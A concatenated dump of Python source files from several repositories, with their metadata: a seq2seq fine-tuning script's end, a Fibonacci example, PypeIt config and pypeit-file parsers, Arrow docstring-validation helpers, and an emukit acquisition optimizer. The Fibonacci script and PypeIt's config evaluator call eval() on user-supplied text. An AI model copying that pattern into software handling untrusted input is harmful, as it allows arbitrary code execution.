model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
data_collator=Seq2SeqDataCollator(tokenizer, data_args, training_args.tpu_num_cores),
compute_metrics=compute_metrics_fn,
tokenizer=tokenizer,
)
all_metrics = {}
# Training
if training_args.do_train:
logger.info("*** Train ***")
train_result = trainer.train(
model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None
)
metrics = train_result.metrics
metrics["train_n_objs"] = data_args.n_train
trainer.save_model() # this also saves the tokenizer
if trainer.is_world_process_zero():
handle_metrics("train", metrics, training_args.output_dir)
all_metrics.update(metrics)
# Need to save the state, since Trainer.save_model saves only the tokenizer with the model
trainer.state.save_to_json(os.path.join(training_args.output_dir, "trainer_state.json"))
# For convenience, we also re-save the tokenizer to the same directory,
# so that you can share your model easily on huggingface.co/models =)
tokenizer.save_pretrained(training_args.output_dir)
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate(
metric_key_prefix="val", max_length=data_args.val_max_target_length, num_beams=data_args.eval_beams
)
metrics["val_n_objs"] = data_args.n_val
metrics["val_loss"] = round(metrics["val_loss"], 4)
if trainer.is_world_process_zero():
handle_metrics("val", metrics, training_args.output_dir)
all_metrics.update(metrics)
if training_args.do_predict:
logger.info("*** Predict ***")
test_output = trainer.predict(
test_dataset=test_dataset,
metric_key_prefix="test",
max_length=data_args.val_max_target_length,
num_beams=data_args.eval_beams,
)
metrics = test_output.metrics
metrics["test_n_objs"] = data_args.n_test
if trainer.is_world_process_zero():
metrics["test_loss"] = round(metrics["test_loss"], 4)
handle_metrics("test", metrics, training_args.output_dir)
all_metrics.update(metrics)
if training_args.predict_with_generate:
test_preds = tokenizer.batch_decode(
test_output.predictions, skip_special_tokens=True, clean_up_tokenization_spaces=True
)
test_preds = lmap(str.strip, test_preds)
write_txt_file(test_preds, os.path.join(training_args.output_dir, "test_generations.txt"))
if trainer.is_world_process_zero():
save_json(all_metrics, os.path.join(training_args.output_dir, "all_results.json"))
return all_metrics
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
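# Editor's note: illustrative sketch, not part of the original script.  The
# argument-parsing branch in main() accepts a single path to a JSON file; a
# minimal example (model name, paths and batch size are placeholder
# assumptions) could look like the following and be launched as
# ``python finetune_trainer_base.py args.json``:
#
# {
#   "model_name_or_path": "facebook/mbart-large-cc25",
#   "data_dir": "./data/wmt_en_ro",
#   "output_dir": "./output",
#   "do_train": true,
#   "per_device_train_batch_size": 4,
#   "predict_with_generate": true
# }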
| 37.802667
| 209
| 0.677836
|
12ded5fe094fb1c68f085cd3c2be731d8234008d
| 1,825
|
py
|
Python
|
dynamic_programming/fibonacci.py
|
srivama/Python
|
809d4c077c179feb077f09a3cd2501f9724366a2
|
[
"MIT"
] | null | null | null |
dynamic_programming/fibonacci.py
|
srivama/Python
|
809d4c077c179feb077f09a3cd2501f9724366a2
|
[
"MIT"
] | null | null | null |
dynamic_programming/fibonacci.py
|
srivama/Python
|
809d4c077c179feb077f09a3cd2501f9724366a2
|
[
"MIT"
] | null | null | null |
"""
This is a pure Python implementation of Dynamic Programming solution to the Fibonacci sequence problem.
"""
from __future__ import print_function
class Fibonacci:
def __init__(self, N=None):
self.fib_array = []
if N:
N = int(N)
self.fib_array.append(0)
self.fib_array.append(1)
for i in range(2, N + 1):
self.fib_array.append(
self.fib_array[i - 1] + self.fib_array[i - 2])
elif N == 0:
self.fib_array.append(0)
def get(self, sequence_no=None):
        if sequence_no is not None:
if sequence_no < len(self.fib_array):
return print(self.fib_array[:sequence_no + 1])
else:
print("Out of bound.")
else:
print("Please specify a value")
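# Editor's note: illustrative alternative, not part of the original module.
# The same sequence can be computed top-down with memoization instead of the
# bottom-up table that the Fibonacci class builds above.
def _fib_memo(n, _cache={0: 0, 1: 1}):
    if n not in _cache:
        _cache[n] = _fib_memo(n - 1) + _fib_memo(n - 2)
    return _cache[n]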
if __name__ == '__main__':
print("\n********* Fibonacci Series Using Dynamic Programming ************\n")
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
print("\n Enter the upper limit for the fibonacci sequence: ", end="")
try:
N = eval(raw_input().strip())
fib = Fibonacci(N)
print(
"\n********* Enter different values to get the corresponding fibonacci sequence, enter any negative number to exit. ************\n")
while True:
print("Enter value: ", end=" ")
try:
i = eval(raw_input().strip())
if i < 0:
print("\n********* Good Bye!! ************\n")
break
fib.get(i)
except NameError:
print("\nInvalid input, please try again.")
except NameError:
print("\n********* Invalid input, good bye!! ************\n")
| 32.589286
| 144
| 0.505753
|
34adf18944b161addb545aa6c40fcb69097d708f
| 19,261
|
py
|
Python
|
pypeit/par/util.py
|
joshwalawender/PypeIt
|
f952cbb2aaee640b5c585be823884a237b441e8e
|
[
"BSD-3-Clause"
] | null | null | null |
pypeit/par/util.py
|
joshwalawender/PypeIt
|
f952cbb2aaee640b5c585be823884a237b441e8e
|
[
"BSD-3-Clause"
] | null | null | null |
pypeit/par/util.py
|
joshwalawender/PypeIt
|
f952cbb2aaee640b5c585be823884a237b441e8e
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Utility functions for PypeIt parameter sets
"""
import os
import time
import glob
import warnings
import textwrap
from IPython import embed
import numpy as np
from astropy.table import Table
from configobj import ConfigObj
from pypeit import msgs
#-----------------------------------------------------------------------
# Parameter utility functions
#-----------------------------------------------------------------------
def _eval_ignore():
"""Provides a list of strings that should not be evaluated."""
return [ 'open', 'file', 'dict', 'list', 'tuple' ]
def recursive_dict_evaluate(d):
"""
Recursively run :func:`eval` on each element of the provided
dictionary.
A raw read of a configuration file with `ConfigObj` results in a
dictionary that contains strings or lists of strings. However, when
assigning the values for the various ParSets, the `from_dict`
methods expect the dictionary values to have the appropriate type.
E.g., the ConfigObj will have something like d['foo'] = '1', when
the `from_dict` method expects the value to be an integer (d['foo']
= 1).
This function tries to evaluate *all* dictionary values, except for
those listed above in the :func:`_eval_ignore` function. Any value
in this list or where::
eval(d[k]) for k in d.keys()
raises an exception is returned as the original string.
This is currently only used in :func:`PypitPar.from_cfg_file`; see
further comments there.
Args:
d (dict):
Dictionary of values to evaluate
Returns:
dict: Identical to input dictionary, but with all string values
replaced with the result of `eval(d[k])` for all `k` in
`d.keys()`.
"""
ignore = _eval_ignore()
for k in d.keys():
if isinstance(d[k], dict):
d[k] = recursive_dict_evaluate(d[k])
elif isinstance(d[k], list):
replacement = []
for v in d[k]:
if v in ignore:
replacement += [ v ]
else:
try:
replacement += [ eval(v) ]
except:
replacement += [ v ]
d[k] = replacement
else:
try:
d[k] = eval(d[k]) if d[k] not in ignore else d[k]
except:
pass
return d
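# Editor's note: illustrative sketch, not part of the original module.  It
# shows the string-to-typed-value conversion performed on a raw ConfigObj
# read; the keys and values are arbitrary examples.
def _example_recursive_dict_evaluate():
    raw = {'overscan': '5', 'use_biasimage': 'True',
           'window': ['1.5', 'None'], 'name': 'keck_lris_blue'}
    out = recursive_dict_evaluate(raw)
    # -> {'overscan': 5, 'use_biasimage': True,
    #     'window': [1.5, None], 'name': 'keck_lris_blue'}
    return out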
def get_parset_list(cfg, pk, parsetclass):
"""
Create a list of ParSets based on a root keyword for a set of
defined groups in the configuration file.
For example, the :class:`InstrumentPar` group allows for a list of
detectors (:class:`DetectorPar`) with keywords like `detector1`,
`detector2`, etc. This function parses the provided configuration
object (`cfg`) to find any sections with `detector` (`pk`) as its
root. The remainder of the section name must be able to be
    converted to an integer and the section itself must be able to set up
    an instance of `parsetclass`. The sections must be numbered
    sequentially from 1..N. E.g., the :class:`InstrumentPar`
    configuration file cannot have `detector1` and `detector3`, but no
    `detector2`. The call to set up the detectors in the
:class:`InstrumentPar` is::
kwargs['detector'] = get_parset_list(cfg, 'detector', DetectorPar)
Args:
cfg (:class:`ConfigObj`, :obj:`dict`):
The top-level configuration that defines a list of
sub-ParSets.
pk (str):
The root of the keywords used to set a list of sub-ParSets.
parsetclass (:class:`pypeit.par.parset.ParSet`):
The class used to construct each element in the list of
parameter subsets. The class **must** have a `from_dict`
method that instantiates the
:class:`pypeit.par.parset.ParSet` based on the provide
subsection/subdict from cfg.
Returns:
list: A list of instances of `parsetclass` parsed from the
provided configuration data.
Raises:
ValueError:
Raised if the indices of the subsections are not sequential
and 1-indexed.
"""
# Get the full list of keys
k = cfg.keys()
# Iterate through the list of keys to find the appropriate sub
# parameter sets and their order.
par = []
order = []
for _k in k:
if _k == pk and cfg[_k] is None:
continue
if pk in _k:
try:
# Get the order for this subgroup (e.g., 2 for
                # 'detector2')
order += [ int(_k.replace(pk,'')) ]
# And instantiate the parameter set
par += [ parsetclass.from_dict(cfg[_k]) ]
except:
continue
if len(par) > 0:
# Make sure the instances are correctly sorted and sequential
srt = np.argsort(order)
if np.any(np.array(order)[srt]-1 != np.arange(order[srt[-1]])):
raise ValueError('Parameter set series must be sequential and 1-indexed.')
# Return the sorted instances
return [par[i] for i in srt]
# No such subsets were defined, so return a null result
return None
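# Editor's note: illustrative sketch, not part of the original module.  It
# demonstrates the keyword layout get_parset_list() expects; _ExamplePar is a
# stand-in for a real ParSet subclass and is an assumption of this sketch.
def _example_get_parset_list():
    class _ExamplePar:
        def __init__(self, d):
            self.d = d
        @classmethod
        def from_dict(cls, d):
            return cls(dict(d))
    cfg = {'detector1': {'binning': '1,1'}, 'detector2': {'binning': '2,2'}}
    # Returns the two _ExamplePar instances, sorted detector1 then detector2
    return get_parset_list(cfg, 'detector', _ExamplePar)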
def parset_to_dict(par):
"""
Convert the provided parset into a dictionary.
Args:
par (ParSet):
Returns:
dict: Converted ParSet
"""
try:
d = dict(ConfigObj(par.to_config(section_name='tmp'))['tmp'])
except:
d = dict(ConfigObj(par.to_config()))
return recursive_dict_evaluate(d)
#-----------------------------------------------------------------------
# Functions for parsing the input pypeit file
# TODO: Should these go into a different module? PypitSetup?
#-----------------------------------------------------------------------
def _read_pypeit_file_lines(ifile):
"""
General parser for a pypeit file.
- Checks that the file exists.
- Reads all the lines in the file
- Removes comments, empty lines, and replaces special characters.
Applies to settings, setup, and user-level reduction files.
Args:
ifile (str): Name of the file to parse.
Returns:
:obj:`numpy.ndarray`: Returns a list of the valid lines in the
files.
"""
# Check the files
if not os.path.isfile(ifile):
msgs.error('The filename does not exist -' + msgs.newline() + ifile)
# Read the input lines and replace special characters
with open(ifile, 'r') as f:
lines = np.array([l.replace('\t', ' ').replace('\n', ' ').strip() \
for l in f.readlines()])
# Remove empty or fully commented lines
lines = lines[np.array([ len(l) > 0 and l[0] != '#' for l in lines ])]
# Remove appended comments and return
return np.array([ l.split('#')[0] for l in lines ])
def _find_pypeit_block(lines, group):
"""
Find the PypeIt group block
Args:
lines (:obj:`list`):
List of file lines
group (:obj:`str`):
Name of group to parse
Returns:
int, int: Starting,ending line of the block; -1 if not present
"""
start = -1
end = -1
for i, l in enumerate(lines):
entries = l.split()
if start < 0 and entries[0] == group and entries[1] == 'read':
start = i+1
continue
if entries[0] == group and entries[1] == 'end':
end = i
continue
if start >= 0 and end >= 0:
break
return start, end
def _parse_data_file_name(inp, current_path):
"""
Expand the data file name as necessary and
then search for all data files
Args:
inp (str): Path
current_path (str or None):
Returns:
list: Glob list of files in the generated a path
"""
out = os.path.expanduser(inp) if inp[0] == '~' else inp
if current_path is not None:
out = os.path.join(current_path, out)
return glob.glob(out)
def _read_data_file_names(lines, file_check=True):
"""
Read the raw data file format
Args:
lines (list):
file_check (bool, optional):
Returns:
list: List of data file names
"""
# Pass through all the lines and:
# - Determine if a path is set
# - Gather the files to skip, can include wildcards
# - Gather the files to read, can include wildcards
current_path = None
skip_inp = []
read_inp = []
for l in lines:
_l = l.split(' ')
if _l[0] == 'skip':
space_ind = l.index(" ")
path = l[space_ind + 1:]
skip_inp += _parse_data_file_name(path, current_path)
continue
if _l[0] == 'path':
space_ind = l.index(" ")
current_path = l[space_ind + 1:]
continue
read_inp += _parse_data_file_name(l, current_path)
# Remove any repeated lines
if len(skip_inp) > 0 and len(skip_inp) != len(set(skip_inp)):
msgs.warn('There are duplicated files to skip.')
skip_inp = list(set(skip_inp))
if len(read_inp) > 0 and len(read_inp) != len(set(read_inp)):
msgs.warn('There are duplicated files to read.')
read_inp = list(set(read_inp))
# Remove any files to skip
for _skip in skip_inp:
if _skip in read_inp:
read_inp.remove(_skip)
# Check that the files exist
if file_check:
for f in read_inp:
if not os.path.isfile(f):
raise FileNotFoundError('{0} does not exist!'.format(f))
return read_inp
def _determine_data_format(lines):
"""
Determine the format of the data block in the .pypeit file.
The test used in this function is pretty basic. A table format is
assumed if the first character in *any* line is `|`.
Args:
lines (:obj:`list`):
The list of lines read from the data block of the pypeit
file.
Returns:
str: The syntax of the data files to read::
'raw': A (list of) file roots to be read or found using
`glob`.
'table': ASCII output of an astropy.table.Table
"""
for l in lines:
if l[0] == '|':
return 'table'
return 'raw'
def _read_data_file_table(lines, file_check=True):
"""
Read the file table format.
Args:
lines (:obj:`list`):
List of lines *within the data* block read from the pypeit
file.
file_check (:obj:`bool`, optional):
Check if the specified data files exist.
Returns:
list, dict, Table: Returns the list of data file names, a
dictionary with the frame types of each file where the key of
the dictionary is the file name, and a Table with the data
provided in the pypeit file. Note that the files listed in the
first object contain the full path, whereas the file names in
the frame type dictionary and the data table do not include the
full path to the file.
    Raises:
        PypeItError:
            Raised if `file_check=True` and any of the specified files
            do not exist, or if the table does not have a 'filename' or
'frametype' column.
"""
# Allow for multiple paths
paths = []
for l in lines:
space_ind = l.index(" ")
if l[:space_ind].strip() != 'path':
break
paths += [ l[space_ind+1:] ]
npaths = len(paths)
header = [ l.strip() for l in lines[npaths].split('|') ][1:-1]
# Minimum columns required
if 'filename' not in header:
msgs.error('Table format failure: No \'filename\' column.')
if 'frametype' not in header:
msgs.error('Table format failure: No \'frametype\' column.')
# Build the table
nfiles = len(lines) - npaths - 1
tbl = np.empty((nfiles, len(header)), dtype=object)
for i in range(nfiles):
row = np.array([ l.strip() for l in lines[i+npaths+1].split('|') ])[1:-1]
if len(row) != tbl.shape[1]:
raise ValueError('Data and header lines have mismatched columns!')
tbl[i,:] = row
data = {}
for i,key in enumerate(header):
data[key] = tbl[:,i]
tbl = Table(data)
# Build full paths to file and set frame types
frametype = {}
data_files = []
for i in range(nfiles):
frametype[tbl['filename'][i]] = tbl['frametype'][i]
for p in paths:
filename = os.path.join(p, tbl['filename'][i])
if os.path.isfile(filename):
break
data_files.append(filename)
if not os.path.isfile(filename) and file_check:
msgs.error('File does not exist: {0}'.format(filename))
return data_files, frametype, tbl
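# Editor's note: illustrative sketch, not part of the original module.  It
# feeds a hand-written data block (the path, file names and column values are
# placeholders) through the table parser above; 'filename' and 'frametype'
# are the only required columns.
def _example_read_data_file_table():
    lines = ['path /data/raw/night1',
             '| filename | frametype |',
             '| b1.fits.gz | bias |',
             '| arc1.fits.gz | arc |']
    data_files, frametype, tbl = _read_data_file_table(lines, file_check=False)
    return data_files, frametype, tbl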
def _parse_setup_lines(lines):
"""Return a list of the setup names"""
setups = []
for l in lines:
if 'Setup' in l:
tsetup = l.split()[1].strip()
# Remove any lingering colon
if tsetup[-1] == ':':
setup = tsetup[:-1]
else:
setup = tsetup
setups.append(setup)
#
return setups
def parse_pypeit_file(ifile, file_check=True, runtime=False):
"""
Parse the user-provided .pypeit reduction file.
Args:
ifile (:obj:`str`):
Name of pypeit file
file_check (:obj:`bool`, optional):
Check that the files in the pypeit configuration data file
exist, and fault if they do not.
runtime (:obj:`bool`, optional):
Perform additional checks if called to run PypeIt
Returns:
5-element tuple containing
- list: List of configuration lines,
- list: List of datafiles to read,
- list: List of frametypes for each file
- :obj:`astropy.table.Table`: Table of user supplied info on data files
- list: List of setup lines.
"""
# Read in the pypeit reduction file
msgs.info('Loading the reduction file')
lines = _read_pypeit_file_lines(ifile)
# Used to select the configuration lines: Anything that isn't part
# of the data or setup blocks is assumed to be part of the
# configuration
is_config = np.ones(len(lines), dtype=bool)
# Parse data block
s, e = _find_pypeit_block(lines, 'data')
if s >= 0 and e < 0:
msgs.error("Missing 'data end' in {0}".format(ifile))
if s < 0:
msgs.error("You haven't specified any data!")
data_format = _determine_data_format(lines[s:e])
if data_format == 'raw':
frametype = None
usrtbl = None
data_files = _read_data_file_names(lines[s:e], file_check=file_check)
elif data_format == 'table':
data_files, frametype, usrtbl = _read_data_file_table(lines[s:e], file_check=file_check)
is_config[s-1:e+1] = False
if len(data_files) == 0 and file_check:
msgs.error('There are no raw data frames' + msgs.newline() +
'Perhaps the path to the data is incorrect?')
else:
msgs.info('Found {0:d} raw data frames'.format(len(data_files)))
# Parse the setup block
s, e = _find_pypeit_block(lines, 'setup')
if s >= 0 and e < 0:
msgs.error("Missing 'setup end' in {0}".format(ifile))
if s < 0:
setups = []
else:
setups = _parse_setup_lines(lines[s:e])
is_config[s-1:e+1] = False
# TODO: This should be moved to the PypeIt class
# Running PypeIt?
if runtime:
for key in ['filename', 'frametype']:
if key not in usrtbl.keys():
msgs.error("Add {:s} to your PypeIt file before using run_pypeit".format(key))
# Setup
if len(setups) != 1:
msgs.error("Add setup info to your PypeIt file in the setup block!")
msgs.info('Input file loaded successfully')
return list(lines[is_config]), data_files, frametype, usrtbl, setups
def pypeit_config_lines(ifile):
"""
Return the config lines from a PypeIt file.
Args:
ifile (str): Name of PypeIt file
Returns:
list: List of configuration lines; will be used for ConfigObj
"""
lines = _read_pypeit_file_lines(ifile)
# Find the config lines, assumed to be everything *except* the lines
# in the data and setup blocks
is_config = np.ones(len(lines), dtype=bool)
s, e = _find_pypeit_block(lines, 'data')
if s >= 0 and e < 0:
msgs.error("Missing 'data end' in {0}".format(ifile))
if not s < 0:
is_config[s-1:e+1] = False
s, e = _find_pypeit_block(lines, 'setup')
if s >= 0 and e < 0:
msgs.error("Missing 'setup end' in {0}".format(ifile))
if not s < 0:
is_config[s-1:e+1] = False
return list(lines[is_config])
def make_pypeit_file(pypeit_file, spectrograph, data_files, cfg_lines=None, setup_mode=False,
setup_lines=None, sorted_files=None, paths=None):
"""
Generate a default PypeIt file
Args:
pypeit_file (str): Name of PYPIT file to be generated
spectrograph (str): Name of spectrograph
data_files (list): List of data files -- essentially Deprecated
cfg_lines (list, optional): List of configuration lines for parameters
setup_mode (bool, optional): If True, 0 out required files for everything except Arc
setup_lines (list, optional):
sorted_files (list, optional):
paths (list, optional): List of paths for slurping data files
"""
# Error checking
if not isinstance(data_files, list):
raise IOError("data_files needs to be a list")
# Defaults
if cfg_lines is None:
_cfg_lines = ['[rdx]']
_cfg_lines += [' spectrograph = {0}'.format(spectrograph)]
else:
_cfg_lines = list(cfg_lines)
# TODO: Bring back checks for the appropriate number of calibration
# frames?
# TODO: Clean up and check validity of _cfg_lines by reading it into
# a ConfigObj?
# Here we go
with open(pypeit_file, 'w') as f:
f.write('# Auto-generated PypeIt file\n')
f.write('# {0}\n'.format(time.strftime("%a %d %b %Y %H:%M:%S",time.localtime())))
f.write("\n")
f.write("# User-defined execution parameters\n")
f.write('\n'.join(_cfg_lines))
f.write('\n')
f.write('\n')
if setup_lines is not None:
f.write("# Setup\n")
f.write("setup read\n")
for sline in setup_lines:
f.write(' '+sline+'\n')
f.write("setup end\n")
f.write("\n")
# Data
f.write("# Read in the data\n")
f.write("data read\n")
# Old school
for datafile in data_files:
f.write(' '+datafile+'\n')
# paths and Setupfiles
if paths is not None:
for path in paths:
f.write(' path '+path+'\n')
if sorted_files is not None:
f.write('\n'.join(sorted_files))
f.write('\n')
f.write("data end\n")
f.write("\n")
msgs.info('PypeIt file written to: {0}'.format(pypeit_file))
| 31.523732
| 96
| 0.582992
|
6ffa90144304545bb9e311a852e9838fc854c08d
| 7,754
|
py
|
Python
|
dev/archery/archery/lang/python.py
|
timkpaine/arrow
|
a96297e65e17e728e4321cdecc7ace146e1363fb
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC0-1.0",
"MIT"
] | 9,734
|
2016-02-17T13:22:12.000Z
|
2022-03-31T09:35:00.000Z
|
dev/archery/archery/lang/python.py
|
timkpaine/arrow
|
a96297e65e17e728e4321cdecc7ace146e1363fb
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC0-1.0",
"MIT"
] | 11,470
|
2016-02-19T15:30:28.000Z
|
2022-03-31T23:27:21.000Z
|
dev/archery/archery/lang/python.py
|
timkpaine/arrow
|
a96297e65e17e728e4321cdecc7ace146e1363fb
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC0-1.0",
"MIT"
] | 2,637
|
2016-02-17T10:56:29.000Z
|
2022-03-31T08:20:13.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import inspect
import tokenize
from contextlib import contextmanager
try:
from numpydoc.validate import Docstring, validate
except ImportError:
have_numpydoc = False
else:
have_numpydoc = True
from ..utils.logger import logger
from ..utils.command import Command, capture_stdout, default_bin
class Flake8(Command):
def __init__(self, flake8_bin=None):
self.bin = default_bin(flake8_bin, "flake8")
class Autopep8(Command):
def __init__(self, autopep8_bin=None):
self.bin = default_bin(autopep8_bin, "autopep8")
@capture_stdout()
def run_captured(self, *args, **kwargs):
return self.run(*args, **kwargs)
def _tokenize_signature(s):
lines = s.encode('ascii').splitlines()
generator = iter(lines).__next__
return tokenize.tokenize(generator)
def _convert_typehint(tokens):
names = []
opening_bracket_reached = False
for token in tokens:
# omit the tokens before the opening bracket
if not opening_bracket_reached:
if token.string == '(':
opening_bracket_reached = True
else:
continue
if token.type == 1: # type 1 means NAME token
names.append(token)
else:
if len(names) == 1:
yield (names[0].type, names[0].string)
elif len(names) == 2:
# two "NAME" tokens follow each other which means a cython
# typehint like `bool argument`, so remove the typehint
# note that we could convert it to python typehints, but hints
# are not supported by _signature_fromstr
yield (names[1].type, names[1].string)
elif len(names) > 2:
raise ValueError('More than two NAME tokens follow each other')
names = []
yield (token.type, token.string)
def inspect_signature(obj):
"""
Custom signature inspection primarily for cython generated callables.
Cython puts the signatures to the first line of the docstrings, which we
can reuse to parse the python signature from, but some gymnastics are
required, like removing the cython typehints.
It converts the cython signature:
array(obj, type=None, mask=None, size=None, from_pandas=None,
bool safe=True, MemoryPool memory_pool=None)
To:
<Signature (obj, type=None, mask=None, size=None, from_pandas=None,
safe=True, memory_pool=None)>
"""
cython_signature = obj.__doc__.splitlines()[0]
cython_tokens = _tokenize_signature(cython_signature)
python_tokens = _convert_typehint(cython_tokens)
python_signature = tokenize.untokenize(python_tokens)
return inspect._signature_fromstr(inspect.Signature, obj, python_signature)
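# Editor's note: illustrative sketch, not part of the original module.  A
# plain Python stand-in whose first docstring line mimics a cython-embedded
# signature; inspect_signature() should recover the typehint-free form
# <Signature (obj, type=None, safe=True, memory_pool=None)>.
def _example_inspect_signature():
    def fake_cython_callable():
        """array(obj, type=None, bool safe=True, MemoryPool memory_pool=None)"""
    return inspect_signature(fake_cython_callable)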
class NumpyDoc:
def __init__(self, symbols=None):
if not have_numpydoc:
raise RuntimeError(
'Numpydoc is not available, install with command: '
'pip install numpydoc==1.1.0'
)
self.symbols = set(symbols or {'pyarrow'})
def traverse(self, fn, obj, from_package):
"""Apply a function on publicly exposed API components.
Recursively iterates over the members of the passed object. It omits
any '_' prefixed and thirdparty (non pyarrow) symbols.
Parameters
----------
obj : Any
from_package : string, default 'pyarrow'
Predicate to only consider objects from this package.
"""
todo = [obj]
seen = set()
while todo:
obj = todo.pop()
if obj in seen:
continue
else:
seen.add(obj)
fn(obj)
for name in dir(obj):
if name.startswith('_'):
continue
member = getattr(obj, name)
module = getattr(member, '__module__', None)
if not (module and module.startswith(from_package)):
continue
todo.append(member)
@contextmanager
def _apply_patches(self):
"""
Patch Docstring class to bypass loading already loaded python objects.
"""
orig_load_obj = Docstring._load_obj
orig_signature = inspect.signature
@staticmethod
def _load_obj(obj):
            # By default it expects a qualname and imports the object, but we
            # have already loaded the object during the API traversal.
if isinstance(obj, str):
return orig_load_obj(obj)
else:
return obj
def signature(obj):
            # inspect.signature tries to parse __text_signature__ if other
            # properties like __signature__ don't exist, but cython doesn't
            # set that property even when the embedsignature cython directive
            # is enabled. The only way to inspect a cython-compiled callable's
            # signature is to parse it from __doc__, provided the
            # embedsignature directive was set during the build phase.
            # So patch the inspect.signature function to attempt to parse the
            # first line of callable.__doc__ as a signature.
try:
return orig_signature(obj)
except Exception as orig_error:
try:
return inspect_signature(obj)
except Exception:
raise orig_error
try:
Docstring._load_obj = _load_obj
inspect.signature = signature
yield
finally:
Docstring._load_obj = orig_load_obj
inspect.signature = orig_signature
def validate(self, from_package='', allow_rules=None,
disallow_rules=None):
results = []
def callback(obj):
try:
result = validate(obj)
except OSError as e:
symbol = f"{obj.__module__}.{obj.__name__}"
logger.warning(f"Unable to validate `{symbol}` due to `{e}`")
return
errors = []
for errcode, errmsg in result.get('errors', []):
if allow_rules and errcode not in allow_rules:
continue
if disallow_rules and errcode in disallow_rules:
continue
errors.append((errcode, errmsg))
if len(errors):
result['errors'] = errors
results.append((obj, result))
with self._apply_patches():
for symbol in self.symbols:
try:
obj = Docstring._load_obj(symbol)
except (ImportError, AttributeError):
print('{} is not available for import'.format(symbol))
else:
self.traverse(callback, obj, from_package=from_package)
return results
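# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# Assuming numpydoc (and pyarrow) are importable, the validator above could be
# driven roughly like this; the rule codes are numpydoc error codes ("GL01",
# "GL02", ...) and are chosen purely for illustration:
#
#     checker = NumpyDoc(symbols={"pyarrow"})
#     results = checker.validate(from_package="pyarrow",
#                                disallow_rules={"GL01", "GL02"})
#     for obj, result in results:
#         for errcode, errmsg in result.get("errors", []):
#             print(f"{obj!r}: {errcode}: {errmsg}")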
| 34.616071
| 79
| 0.60472
|
c7220b1cb4e8e24a248bae47f20de784f1573890
| 2,802
|
py
|
Python
|
emukit/core/optimization/gradient_acquisition_optimizer.py
|
aaronkl/emukit
|
ccd80811a1b8e11ece97dceb2f8c7b92a7a4f236
|
[
"Apache-2.0"
] | 6
|
2019-06-02T21:23:27.000Z
|
2020-02-17T09:46:30.000Z
|
emukit/core/optimization/gradient_acquisition_optimizer.py
|
aaronkl/emukit
|
ccd80811a1b8e11ece97dceb2f8c7b92a7a4f236
|
[
"Apache-2.0"
] | 4
|
2019-05-17T13:30:21.000Z
|
2019-06-21T13:49:19.000Z
|
emukit/core/optimization/gradient_acquisition_optimizer.py
|
aaronkl/emukit
|
ccd80811a1b8e11ece97dceb2f8c7b92a7a4f236
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Optional, Tuple
from GPyOpt.optimization import AcquisitionOptimizer
import numpy as np
from .acquisition_optimizer import AcquisitionOptimizerBase
from .context_manager import ContextManager
from .. import ParameterSpace
from ..acquisition import Acquisition
import logging
_log = logging.getLogger(__name__)
class GradientAcquisitionOptimizer(AcquisitionOptimizerBase):
""" Optimizes the acquisition function using a quasi-Newton method (L-BFGS).
Can be used for continuous acquisition functions.
"""
def __init__(self, space: ParameterSpace, **kwargs) -> None:
"""
:param space: The parameter space spanning the search problem.
:param kwargs: Additional keyword arguments supported
by GPyOpt.optimization.AcquisitionOptimizer.
Note: only the 'lbfgs' optimizer is allowed.
"""
super().__init__(space)
if 'optimizer' in kwargs and kwargs['optimizer'] != 'lbfgs':
raise ValueError("GradientAcquisitionOptimizer only supports"
"GPyOpt\'s lbfgs optimizer, got {}".format(kwargs['optimizer']))
self.gpyopt_acquisition_optimizer = AcquisitionOptimizer(self.gpyopt_space, **kwargs)
def _optimize(self, acquisition: Acquisition, context_manager: ContextManager)\
-> Tuple[np.ndarray, np.ndarray]:
"""
        Implementation of the abstract method.
        Takes gradients into account if the acquisition supports them.
        See AcquisitionOptimizerBase._optimize for parameter descriptions.
See class docstring for implementation details.
"""
self.gpyopt_acquisition_optimizer.context_manager = context_manager._gpyopt_context_manager
        # Take the negative of the acquisition function because it is to be maximised while the optimizer minimises
f = lambda x: -acquisition.evaluate(x)
# Context validation
if len(context_manager.contextfree_space.parameters) == 0:
_log.warning("All parameters are fixed through context")
x = np.array(context_manager._gpyopt_context_manager.context_value)[None, :]
return x, f(x)
def f_df(x):
f_value, df_value = acquisition.evaluate_with_gradients(x)
return -f_value, -df_value
if acquisition.has_gradients:
_log.info("Starting gradient-based optimization of acquisition function {}".format(type(acquisition)))
x, f_min = self.gpyopt_acquisition_optimizer.optimize(f, None, f_df)
else:
_log.info("Starting gradient-free optimization of acquisition function {}".format(type(acquisition)))
x, f_min = self.gpyopt_acquisition_optimizer.optimize(f, None, None)
return x, -f_min
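# --- Hedged illustrative sketch (added; not part of the original emukit code) ---
# `_optimize` above negates the acquisition value and gradient because the
# acquisition is maximised while the wrapped optimizer minimises. The toy
# example below shows the same trick with scipy.optimize.minimize on a made-up
# quadratic "acquisition"; scipy is assumed to be available and nothing here is
# part of the emukit API.
if __name__ == "__main__":
    from scipy.optimize import minimize

    def toy_acquisition_with_gradients(x):
        # maximal at x == 1; returns (value, gradient) like evaluate_with_gradients
        return -np.sum((x - 1.0) ** 2), -2.0 * (x - 1.0)

    def negated(x):
        value, gradient = toy_acquisition_with_gradients(x)
        return -value, -gradient  # the minimiser sees the negated problem

    result = minimize(negated, x0=np.zeros(2), jac=True, method="L-BFGS-B")
    print("argmax:", result.x, "max acquisition value:", -result.fun)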
| 43.78125
| 114
| 0.693433
|
